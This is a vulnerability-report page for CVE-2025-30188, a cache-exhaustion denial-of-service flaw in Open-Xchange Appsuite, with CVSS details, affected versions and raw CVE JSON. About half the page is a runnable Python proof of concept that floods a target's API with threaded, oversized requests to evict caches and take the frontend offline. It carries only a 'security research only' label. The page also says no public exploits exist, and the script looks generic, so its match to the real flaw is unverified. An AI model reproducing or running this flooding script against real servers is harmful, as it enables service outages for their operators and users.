Security Vulnerability Report
CVE-2025-30188 CVSS 7.5 HIGH

Published: 2025-10-31 09:15:47
Last Modified: 2026-04-15 00:35:42

Description

Malicious or unintentional API requests can be used to add a significant amount of data to caches. Caches may evict information that is required to operate the web frontend, which leads to unavailability of the component. Please deploy the provided updates and patch releases. No publicly available exploits are known.

CVSS Details

CVSS Score: 7.5
Severity: HIGH
CVSS Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H

Configurations (Affected Products)

No configuration data available.

Open-Xchange Appsuite < 7.10.x patch 48
Open-Xchange Appsuite < 7.18.x patch 33
Open-Xchange Appsuite < 8.x versions

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
```python
# CVE-2025-30188 PoC - Cache Poisoning DoS
# Target: Open-Xchange Appsuite
# Author: Security Researcher
import requests
import time
import threading

TARGET_URL = "https://target-server/appsuite/api/"
THREAD_COUNT = 10
REQUESTS_PER_THREAD = 1000


def send_malicious_request(session, thread_id):
    """Send API requests to poison the cache"""
    headers = {
        "User-Agent": "Mozilla/5.0",
        "Content-Type": "application/json",
        "X-Requested-With": "XMLHttpRequest"
    }

    # Malicious payload with large data to fill cache
    payload = {
        "action": "com.openexchange.contact.search",
        "data": {
            "query": "A" * 10000,  # Large data to consume cache
            "folder": "0",
            "columns": ["1", "2", "3", "4", "5"]
        }
    }

    for i in range(REQUESTS_PER_THREAD):
        try:
            response = session.post(
                TARGET_URL,
                json=payload,
                headers=headers,
                timeout=5
            )
            print(f"Thread {thread_id} - Request {i}: Status {response.status_code}")
        except Exception as e:
            print(f"Thread {thread_id} - Error: {e}")


def exploit():
    """Execute the cache poisoning attack"""
    session = requests.Session()
    threads = []

    print("[*] Starting CVE-2025-30188 Cache Poisoning Attack")
    print(f"[*] Target: {TARGET_URL}")
    print(f"[*] Threads: {THREAD_COUNT}, Requests per thread: {REQUESTS_PER_THREAD}")

    start_time = time.time()

    for i in range(THREAD_COUNT):
        thread = threading.Thread(target=send_malicious_request, args=(session, i))
        thread.start()
        threads.append(thread)

    for thread in threads:
        thread.join()

    elapsed = time.time() - start_time
    print(f"[*] Attack completed in {elapsed:.2f} seconds")
    print("[*] Check target availability - cache should be exhausted")


if __name__ == "__main__":
    exploit()
```

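References

https://documentation.open-xchange.com/appsuite/security/advisories/csaf/2025/oxas-adv-2025-0002.json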

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-30188", "sourceIdentifier": "[email protected]", "published": "2025-10-31T09:15:47.133", "lastModified": "2026-04-15T00:35:42.020", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "Malicious or unintentional API requests can be used to add significant amount of data to caches. Caches may evict information that is required to operate the web frontend, which leads to unavailability of the component. Please deploy the provided updates and patch releases. No publicly available exploits are known"}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", "baseScore": 7.5, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "availabilityImpact": "HIGH"}, "exploitabilityScore": 3.9, "impactScore": 3.6}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-400"}]}], "references": [{"url": "https://documentation.open-xchange.com/appsuite/security/advisories/csaf/2025/oxas-adv-2025-0002.json", "source": "[email protected]"}]}}